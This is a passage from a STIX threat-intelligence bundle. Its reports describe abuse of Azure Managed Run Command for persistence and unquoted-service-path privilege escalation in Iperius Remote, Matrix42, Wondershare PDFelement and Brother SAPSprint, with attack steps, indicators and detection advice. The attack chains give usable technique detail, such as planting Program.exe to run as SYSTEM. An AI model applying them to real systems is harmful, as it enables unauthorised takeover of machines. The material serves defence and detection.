      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--eb407a8e-d599-5bfe-8ea7-a8cbfa5d1bd0",
      "target_ref": "attack-pattern--5d22e947-f5b5-5413-afc0-4129fd64c345"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--eb407a8e-d599-5bfe-8ea7-a8cbfa5d1bd0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Azure VM Managed Run Command Abuse for Execution and Persistence",
      "description": "## Overview\n\nAdversaries are known to leverage legitimate cloud platform functionalities for malicious purposes, and the Azure VM Managed Run Command is one such target. This feature allows for the creation or update of a persistent resource on an Azure Virtual Machine or Virtual Machine Scale Set, which executes a supplied script with high privileges (System on Windows, root on Linux). Unlike the ephemeral \"runCommand/action,\" the managed Run Command, identified by operations such as \"MICROSOFT.COMPUTE/VIRTUALMACHINES/RUNCOMMANDS/WRITE,\" leaves a durable object, making it suitable for establishing persistence. This technique allows attackers to evade detection mechanisms that primarily monitor transient command executions. Detection focuses on identifying instances where an identity that has not previously performed this operation initiates a managed run command, signaling unusual or unauthorized activity.\n\n## Attack Chain\n\n1.  **Initial Access:** An attacker gains initial access to an Azure environment, typically through compromised credentials for an Azure Active Directory principal with sufficient permissions (e.g., Virtual Machine Contributor, Owner role on a resource group or subscription).\n2.  **Reconnaissance:** The attacker identifies target Azure Virtual Machines or Virtual Machine Scale Sets that can be accessed and abused for execution and persistence.\n3.  **Defense Evasion:** To avoid detection by security tools monitoring common execution methods, the attacker opts to use the less commonly scrutinized Managed Run Command (`runcommands/write`) instead of the action-based `runCommand/action`.\n4.  **Execution via Managed Run Command:** The compromised principal creates or updates a Managed Run Command resource on the target VM/VMSS, embedding a malicious script. This action executes the script as System (Windows) or root (Linux) upon creation/update.\n5.  **Persistence Establishment:** The Managed Run Command resource itself serves as a persistent backdoor, allowing the attacker to re-execute the script or maintain a foothold.\n6.  **Command and Control (C2):** The executed script establishes a C2 channel, allowing the attacker to remotely control the compromised VM.\n7.  **Lateral Movement / Data Exfiltration:** With C2 established and high privileges, the attacker proceeds with further objectives, such as lateral movement within the Azure environment or exfiltration of sensitive data.\n8.  **Impact:** The attacker maintains control and can perform arbitrary actions on the compromised virtual machine.\n\n## Impact\n\nSuccessful exploitation of this technique grants adversaries System (Windows) or root (Linux) level code execution on targeted Azure Virtual Machines and Virtual Machine Scale Sets. This leads to persistent access to the compromised resources, allowing attackers to establish command and control, deploy additional malware, steal sensitive data, pivot to other resources within the Azure subscription, or disrupt operations. The persistent nature of the managed run command means that even after a potential reboot, the attacker's script could re-execute, maintaining the breach. While specific victim counts are not available for this technique, it poses a significant risk to any organization utilizing Azure IaaS with insufficient logging or monitoring.\n\n## Recommendation\n\n*   Deploy the provided Sigma rules to your SIEM solution to detect suspicious Azure Managed Run Command operations.\n*   Configure Azure Activity Logs to be ingested into your SIEM for correlation and analysis, specifically for the `MICROSOFT.COMPUTE/VIRTUALMACHINES/RUNCOMMANDS/WRITE` operation.\n*   Baseline expected service principals, managed identities, and administrator users that legitimately create or update Azure VM Managed Run Commands and exclude them from alerting to reduce false positives.\n*   Investigate `azure.activitylogs.identity.authorization.evidence.principal_id` for any unusual principal executing managed run commands.\n*   Review the RBAC roles assigned to principals triggering these alerts, focusing on least privilege.\n*   Correlate alerts with `source.ip` to identify if the activity originates from unusual or untrusted IP addresses.\n",
      "published": "2026-06-19T15:50:17Z",
      "labels": [
        "cloud",
        "azure",
        "execution",
        "persistence",
        "defense-evasion",
        "vm",
        "iac"
      ],
      "object_refs": [
        "attack-pattern--5d22e947-f5b5-5413-afc0-4129fd64c345"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.netspi.com/blog/technical-blog/adversary-simulation/7-ways-to-execute-command-on-azure-virtual-machine-virtual-machine-scale-sets/"
        },
        {
          "source_name": "reference",
          "url": "https://learn.microsoft.com/en-us/azure/virtual-machines/windows/run-command-managed"
        },
        {
          "source_name": "reference",
          "url": "https://hackingthe.cloud/azure/run-command-abuse/"
        },
        {
          "source_name": "reference",
          "url": "https://blog.pwnedlabs.io/diving-deep-into-azure-vm-attack-vectors"
        },
        {
          "source_name": "reference",
          "url": "https://www.sysdig.com/blog/the-expendable-extension-name-azure-vmaccess-naming-chaos-password-resets-and-a-detection-gap"
        }
      ],
      "confidence": 60
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--fd41bf55-e7c5-545a-85f2-1a5e3e430a88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: http://www.iperiusremote.com",
      "pattern": "[url:value = 'http://www.iperiusremote.com']",
      "pattern_type": "stix",
      "valid_from": "2026-06-19T15:55:21Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fb0af624-ee56-59f6-a575-bf9a629e92fb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f0204129-54a1-5d95-855a-30edec2c4d23",
      "target_ref": "indicator--fd41bf55-e7c5-545a-85f2-1a5e3e430a88"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--6b788a70-325f-58b3-840d-53e5eafaf771",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.exploit-db.com/exploits/40427",
      "pattern": "[url:value = 'https://www.exploit-db.com/exploits/40427']",
      "pattern_type": "stix",
      "valid_from": "2026-06-19T15:55:21Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8a3d140b-b51b-5d68-845a-d5ae476b5364",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f0204129-54a1-5d95-855a-30edec2c4d23",
      "target_ref": "indicator--6b788a70-325f-58b3-840d-53e5eafaf771"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--eed3b2b4-3ddb-51be-931a-5f718bb256eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.iperiusremote.com/download.aspx",
      "pattern": "[url:value = 'https://www.iperiusremote.com/download.aspx']",
      "pattern_type": "stix",
      "valid_from": "2026-06-19T15:55:21Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--54c1f1b9-cf68-558e-834b-737cdf23ad5d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f0204129-54a1-5d95-855a-30edec2c4d23",
      "target_ref": "indicator--eed3b2b4-3ddb-51be-931a-5f718bb256eb"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--59287f43-2c37-5fc2-a2bb-a8b81cc97955",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.vulncheck.com/advisories/iperius-remote-unquoted-service-path-elevation-of_privilege",
      "pattern": "[url:value = 'https://www.vulncheck.com/advisories/iperius-remote-unquoted-service-path-elevation-of_privilege']",
      "pattern_type": "stix",
      "valid_from": "2026-06-19T15:55:21Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c9386334-2b87-5fc1-9419-641aceb38ec3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f0204129-54a1-5d95-855a-30edec2c4d23",
      "target_ref": "indicator--59287f43-2c37-5fc2-a2bb-a8b81cc97955"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Hijack Execution Flow",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1574",
          "url": "https://attack.mitre.org/techniques/T1574"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e383a1ea-2e56-5c34-a5db-9ac0f6291d8c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f0204129-54a1-5d95-855a-30edec2c4d23",
      "target_ref": "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--f0204129-54a1-5d95-855a-30edec2c4d23",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2016-20089: Iperius Remote Unquoted Service Path Vulnerability",
      "description": "## Overview\n\nCVE-2016-20089 describes an unquoted service path vulnerability impacting Iperius Remote version 1.7.0. This flaw allows a local attacker to escalate privileges to SYSTEM. The vulnerability arises when the Iperius Remote service is installed in a directory path containing spaces (e.g., `C:\\Program Files\\Iperius Remote\\`), but the service executable path is not enclosed in quotation marks in the Windows registry. An attacker can exploit this by placing a specially named malicious executable (e.g., `Program.exe`) in an earlier part of the path (e.g., `C:\\`). When the vulnerable service attempts to start, the operating system will incorrectly interpret the path and execute the attacker's malicious payload with SYSTEM privileges, granting full control over the compromised system. This vulnerability has a CVSS v3.1 Base Score of 7.8, indicating high severity.\n\n## Attack Chain\n\n1.  **Vulnerability Identification**: An attacker with local user privileges identifies an Iperius Remote 1.7.0 service installed on a Windows system with an unquoted service path, typically in a directory containing spaces (e.g., `C:\\Program Files\\Iperius Remote\\IperiusRemoteService.exe`).\n2.  **Payload Placement**: The attacker places a malicious executable, for example, named `Program.exe`, into the root directory of the drive (e.g., `C:\\Program.exe`).\n3.  **Persistence Establishment**: The malicious executable is designed to perform its intended actions, such as creating a backdoor or enabling remote access, to maintain control.\n4.  **Triggering Execution**: The attacker either waits for the next scheduled service restart or system reboot, or manually triggers a service restart (if permitted by current privileges).\n5.  **Path Interpretation**: When the Iperius Remote service attempts to start, the Windows Service Control Manager, due to the unquoted path, first attempts to execute `C:\\Program.exe` instead of the legitimate `C:\\Program Files\\Iperius Remote\\IperiusRemoteService.exe`.\n6.  **Privilege Escalation**: The attacker's `C:\\Program.exe` is executed with the high privileges of the Iperius Remote service, which typically runs as the `SYSTEM` user.\n7.  **Arbitrary Code Execution**: The malicious `Program.exe` payload executes with SYSTEM privileges, granting the attacker full control over the system, enabling further actions like data exfiltration, deploying additional malware, or creating new privileged user accounts.\n\n## Impact\n\nSuccessful exploitation of CVE-2016-20089 leads to local privilege escalation from a standard user account to SYSTEM privileges. This grants the attacker complete control over the compromised Windows system, bypassing security controls, installing rootkits, creating new administrative users, or disabling critical security software. While no specific victim count or targeted sectors are detailed, any organization utilizing Iperius Remote 1.7.0 on Windows systems is susceptible, facing severe consequences including data breach, system compromise, and further network infiltration.\n\n## Recommendation\n\n*   **Patch CVE-2016-20089**: Update Iperius Remote to a version higher than 1.7.0 that addresses the unquoted service path vulnerability immediately.\n*   **Implement Quoted Paths**: Ensure all Windows services are installed with their executable paths enclosed in quotation marks in the registry, especially for services located in directories containing spaces.\n*   **Deploy Sigma Rule for Execution**: Deploy the \"Detect CVE-2016-20089 Exploitation - Unquoted Service Path Execution\" Sigma rule to your SIEM to alert on suspicious process executions from common unquoted service path prefixes.\n*   **Deploy Sigma Rule for File Creation**: Deploy the \"Detect Suspicious Executable Creation in Unquoted Service Path Locations\" Sigma rule to your SIEM to identify attacker attempts to stage malicious executables.\n*   **Enable Process Creation Logging**: Ensure `process_creation` logging (e.g., via Sysmon) is enabled on all Windows endpoints to support the detection rules provided.\n*   **Enable File Event Logging**: Ensure `file_event` logging (e.g., via Sysmon) is enabled on all Windows endpoints to support detection of suspicious file creations.\n",
      "published": "2026-06-19T15:55:21Z",
      "labels": [
        "privilege-escalation",
        "windows",
        "vulnerability",
        "unquoted-service-path"
      ],
      "object_refs": [
        "indicator--fd41bf55-e7c5-545a-85f2-1a5e3e430a88",
        "indicator--6b788a70-325f-58b3-840d-53e5eafaf771",
        "indicator--eed3b2b4-3ddb-51be-931a-5f718bb256eb",
        "indicator--59287f43-2c37-5fc2-a2bb-a8b81cc97955",
        "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-20089"
        },
        {
          "source_name": "reference",
          "url": "http://www.iperiusremote.com"
        },
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/40427"
        },
        {
          "source_name": "reference",
          "url": "https://www.iperiusremote.com/download.aspx"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/iperius-remote-unquoted-service-path-elevation-of_privilege"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Hijack Execution Flow",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1574",
          "url": "https://attack.mitre.org/techniques/T1574"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6dd8112b-e420-5e64-bacc-26d904059f82",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f752b6a6-d35b-53b3-8740-f8790fa6a57c",
      "target_ref": "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--6587be55-e832-5b06-9b3b-4af4604cd32b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Create or Modify System Process",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1543",
          "url": "https://attack.mitre.org/techniques/T1543"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--081861ef-95b1-5909-adfb-43f5c390396a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f752b6a6-d35b-53b3-8740-f8790fa6a57c",
      "target_ref": "attack-pattern--6587be55-e832-5b06-9b3b-4af4604cd32b"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--f752b6a6-d35b-53b3-8740-f8790fa6a57c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2016-20095: Matrix42 Remote Control Host Unquoted Service Path Privilege Escalation",
      "description": "## Overview\n\nCVE-2016-20095 describes an unquoted service path vulnerability impacting Matrix42 Remote Control Host version 3.20.0031. Specifically, the `FastViewerRemoteService` and `FastViewerRemoteProxy` services are susceptible. This flaw allows a local attacker, who already has basic user access to a vulnerable system, to escalate their privileges to SYSTEM. The vulnerability arises because the service executable's path is not enclosed in quotation marks during registration, enabling the Windows Service Control Manager to misinterpret spaces in the path. By strategically placing a malicious executable with a crafted name (e.g., `Program.exe`) within the `C:\\Program Files\\` directory, an attacker can trick the operating system into executing their arbitrary code with elevated permissions during service startup, gaining full control over the compromised host.\n\n## Attack Chain\n\n1.  An attacker gains local user access to a system running Matrix42 Remote Control Host.\n2.  The attacker identifies that the `FastViewerRemoteService` or `FastViewerRemoteProxy` services are configured with an unquoted service path, such as `C:\\Program Files\\Matrix42\\Remote Control Host\\FastViewerRemoteService.exe`.\n3.  The attacker crafts a malicious executable, for instance, `Program.exe`, designed to perform unauthorized actions (e.g., create a new user, install a backdoor, deploy additional malware).\n4.  The attacker places this `Program.exe` file into the `C:\\Program Files\\` directory, which is often writable by standard users, especially within certain subdirectories or older Windows versions.\n5.  The attacker waits for a system reboot, forces a service restart (if permissions allow), or waits for an administrative action that triggers a restart of the vulnerable service.\n6.  During service startup, the Windows Service Control Manager attempts to locate and execute the service binary. Due to the unquoted path, it first interprets `C:\\Program.exe` as the intended executable.\n7.  The malicious `C:\\Program.exe` is executed instead of the legitimate service binary, inheriting SYSTEM privileges due to the service's configuration.\n8.  The attacker achieves SYSTEM-level privilege escalation, enabling full control over the compromised host for further malicious activities, such as data exfiltration, lateral movement, or persistent access.\n\n## Impact\n\nThe successful exploitation of CVE-2016-20095 grants a local attacker SYSTEM-level privileges on the compromised system. This is a critical escalation that allows complete control over the operating system, including the ability to install rootkits, disable security software, exfiltrate sensitive data, or establish persistent access. While specific victim counts are not available, any organization utilizing vulnerable versions of Matrix42 Remote Control Host is at risk of complete system compromise if a local attacker gains a foothold. The vulnerability's age indicates that unpatched systems could still be prevalent, posing a significant risk.\n\n## Recommendation\n\n*   Deploy the Sigma rules provided in this brief to your SIEM and tune for your environment to detect `C:\\Program.exe` process creation and file creation in `C:\\Program Files\\`.\n*   Monitor for process creation events (`process_creation` log source) where `Program.exe` is executed from the `C:\\Program Files\\` directory with SYSTEM privileges.\n*   Monitor for file creation events (`file_event` log source) of `Program.exe` within the `C:\\Program Files\\` directory.\n*   Patch Matrix42 Remote Control Host to a version greater than 3.20.0031 as advised by the vendor on `https://www.matrix42.com/`.\n",
      "published": "2026-06-19T15:56:28Z",
      "labels": [
        "privilege-escalation",
        "unquoted-service-path",
        "windows",
        "matrix42"
      ],
      "object_refs": [
        "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597",
        "attack-pattern--6587be55-e832-5b06-9b3b-4af4604cd32b"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-20095"
        },
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/39908"
        },
        {
          "source_name": "reference",
          "url": "https://www.matrix42.com/"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/matrix42-remote-control-host-unquoted-path-privilege-escalation"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2baa01b4-8d83-56b1-b496-e0921c862eb7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: http://download.wondershare.com/inst/pdfelement_setup_full1042.exe",
      "pattern": "[url:value = 'http://download.wondershare.com/inst/pdfelement_setup_full1042.exe']",
      "pattern_type": "stix",
      "valid_from": "2026-06-19T16:07:36Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--26b4292e-cc6f-5a58-82ae-4e0d03d77693",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a462a817-7678-537e-b9ea-1b1c0908464b",
      "target_ref": "indicator--2baa01b4-8d83-56b1-b496-e0921c862eb7"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--12ce3745-102d-5a47-86e3-bd387bbf9f03",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.exploit-db.com/exploits/40535",
      "pattern": "[url:value = 'https://www.exploit-db.com/exploits/40535']",
      "pattern_type": "stix",
      "valid_from": "2026-06-19T16:07:36Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--70b41549-01ad-5e58-a562-5701c9c35440",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a462a817-7678-537e-b9ea-1b1c0908464b",
      "target_ref": "indicator--12ce3745-102d-5a47-86e3-bd387bbf9f03"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d8a2ea64-44e4-5e00-8f27-f9b337978710",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.vulncheck.com/advisories/wondershare-pdfelement-privilege-escalation-via-unquoted-service-path",
      "pattern": "[url:value = 'https://www.vulncheck.com/advisories/wondershare-pdfelement-privilege-escalation-via-unquoted-service-path']",
      "pattern_type": "stix",
      "valid_from": "2026-06-19T16:07:36Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b0017a60-479a-5be5-9c3c-fbd5b5f0db13",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a462a817-7678-537e-b9ea-1b1c0908464b",
      "target_ref": "indicator--d8a2ea64-44e4-5e00-8f27-f9b337978710"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--0b4083f0-2c1e-5e5b-9737-bc4a25ea1c9f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.wondershare.com/",
      "pattern": "[url:value = 'https://www.wondershare.com/']",
      "pattern_type": "stix",
      "valid_from": "2026-06-19T16:07:36Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--af6a1786-0162-5b40-b53d-acc67c20cdb6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a462a817-7678-537e-b9ea-1b1c0908464b",
      "target_ref": "indicator--0b4083f0-2c1e-5e5b-9737-bc4a25ea1c9f"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Hijack Execution Flow",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1574",
          "url": "https://attack.mitre.org/techniques/T1574"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b8655899-de1a-57b3-8acd-bef7f909c8b9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a462a817-7678-537e-b9ea-1b1c0908464b",
      "target_ref": "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--79df8e32-7df0-58a7-bdfd-b4ffdf52a39a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a462a817-7678-537e-b9ea-1b1c0908464b",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--a462a817-7678-537e-b9ea-1b1c0908464b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2020-37254 - Wondershare PDFelement Unquoted Service Path Privilege Escalation",
      "description": "## Overview\n\nCVE-2020-37254 describes a privilege escalation vulnerability affecting Wondershare PDFelement version 5.2.9. The flaw resides in the 'WsAppService' Windows service, which is configured with an unquoted service path. This common oversight allows a local attacker, already present on a compromised system, to place a malicious executable in a specific directory within the service path. When the vulnerable service attempts to restart, or upon system reboot, the Windows Service Control Manager (SCM) will incorrectly parse the unquoted path and execute the attacker's malicious binary instead of the legitimate service executable. Crucially, this execution occurs with `LocalSystem` privileges, granting the attacker full control over the affected system. This vulnerability allows any low-privileged user to elevate their permissions to the highest level on a Windows system where PDFelement 5.2.9 is installed.\n\n## Attack Chain\n\n1.  A local attacker gains initial access to a target Windows system as a low-privileged user.\n2.  The attacker identifies the 'WsAppService' service associated with Wondershare PDFelement 5.2.9, recognizing its unquoted service path (e.g., `C:\\Program Files\\Wondershare\\PDFelement\\WsAppService\\WsAppService.exe`).\n3.  The attacker creates a malicious executable named `Program.exe` (or `WsAppService.exe`) and places it in an earlier directory in the unquoted path, such as `C:\\Program Files\\`.\n4.  The attacker waits for the 'WsAppService' to restart, either manually triggered, due to a system reboot, or through scheduled tasks.\n5.  When the SCM attempts to start the service, it encounters the unquoted path `C:\\Program Files\\Wondershare\\PDFelement\\WsAppService\\WsAppService.exe`.\n6.  Due to the missing quotes, the SCM incorrectly interprets the first space as a delimiter and attempts to execute `C:\\Program.exe`.\n7.  The attacker's malicious `Program.exe` is then executed with `LocalSystem` privileges, granting the attacker maximum control over the system.\n8.  The malicious executable proceeds to perform actions such as creating new administrative users, installing persistent backdoors, or disabling security software, establishing a strong foothold on the system.\n\n## Impact\n\nSuccessful exploitation of CVE-2020-37254 grants a local attacker `LocalSystem` privileges on the affected Windows system. This level of access allows complete control over the operating system, enabling the attacker to install arbitrary programs, view, change, or delete data, create new user accounts with full privileges, and disable system security features. While specific victim counts are not available, any organization utilizing Wondershare PDFelement 5.2.9 is susceptible. The impact could range from unauthorized data exfiltration to complete system compromise and lateral movement within the network, potentially leading to widespread damage and regulatory non-compliance.\n\n## Recommendation\n\n*   Patch CVE-2020-37254 by upgrading Wondershare PDFelement to a version beyond 5.2.9 that addresses the unquoted service path vulnerability. Refer to official Wondershare advisories for patching instructions.\n*   Deploy the provided Sigma rules to your SIEM to detect attempts at exploiting unquoted service paths.\n*   Enable comprehensive `registry_set` logging to monitor modifications to `SYSTEM\\CurrentControlSet\\Services` paths, specifically looking for unquoted `ImagePath` values.\n*   Enable `process_creation` logging to capture `CommandLine` arguments and `ParentImage` to identify suspicious service executions as described in the Sigma rules.\n*   Review and restrict write permissions to common program file directories like `C:\\Program Files\\` and `C:\\Program Files (x86)\\` to prevent unauthorized file placement.\n",
      "published": "2026-06-19T16:07:36Z",
      "labels": [
        "privilege-escalation",
        "vulnerability",
        "windows",
        "cve"
      ],
      "object_refs": [
        "indicator--2baa01b4-8d83-56b1-b496-e0921c862eb7",
        "indicator--12ce3745-102d-5a47-86e3-bd387bbf9f03",
        "indicator--d8a2ea64-44e4-5e00-8f27-f9b337978710",
        "indicator--0b4083f0-2c1e-5e5b-9737-bc4a25ea1c9f",
        "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/40535"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/wondershare-pdfelement-privilege-escalation-via-unquoted-service-path"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37254"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Hijack Execution Flow",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1574",
          "url": "https://attack.mitre.org/techniques/T1574"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c84b5017-9d70-5f99-bee2-d74542e01289",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b4289a38-db15-5b2b-a80f-791cd6bfa059",
      "target_ref": "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--6587be55-e832-5b06-9b3b-4af4604cd32b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Create or Modify System Process",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1543",
          "url": "https://attack.mitre.org/techniques/T1543"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--23b74dfc-947f-5468-bfa6-56d2077aaa6d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b4289a38-db15-5b2b-a80f-791cd6bfa059",
      "target_ref": "attack-pattern--6587be55-e832-5b06-9b3b-4af4604cd32b"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b4289a38-db15-5b2b-a80f-791cd6bfa059",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2021-47985: Brother SAPSprint Unquoted Service Path Privilege Escalation",
      "description": "## Overview\n\nCVE-2021-47985 describes a local privilege escalation vulnerability affecting Brother SAPSprint version 7.60. The vulnerability stems from an unquoted service path in the SAPSprint service binary. This configuration allows a local attacker, who has already gained initial access to a compromised system, to elevate their privileges to `LocalSystem`. By strategically placing a malicious executable, typically named `Program.exe`, in a higher-priority directory within the unquoted service path (such as `C:\\Program.exe` if the legitimate service path is `C:\\Program Files\\Brother\\SAPSprint\\Service.exe`), the attacker can ensure their payload is executed with maximum system privileges when the SAPSprint service is started or restarted. This vulnerability was published to NVD on June 19, 2026, highlighting a known method for privilege escalation on affected Windows systems running the specific Brother software.\n\n## Attack Chain\n\n1.  **Initial Access**: An attacker gains local user-level access to a Windows system running Brother SAPSprint 7.60.\n2.  **Vulnerability Identification**: The attacker identifies the SAPSprint service running with an unquoted service path containing spaces (e.g., `C:\\Program Files\\Brother\\SAPSprint\\SAPSprint.exe`).\n3.  **Payload Creation**: The attacker crafts a 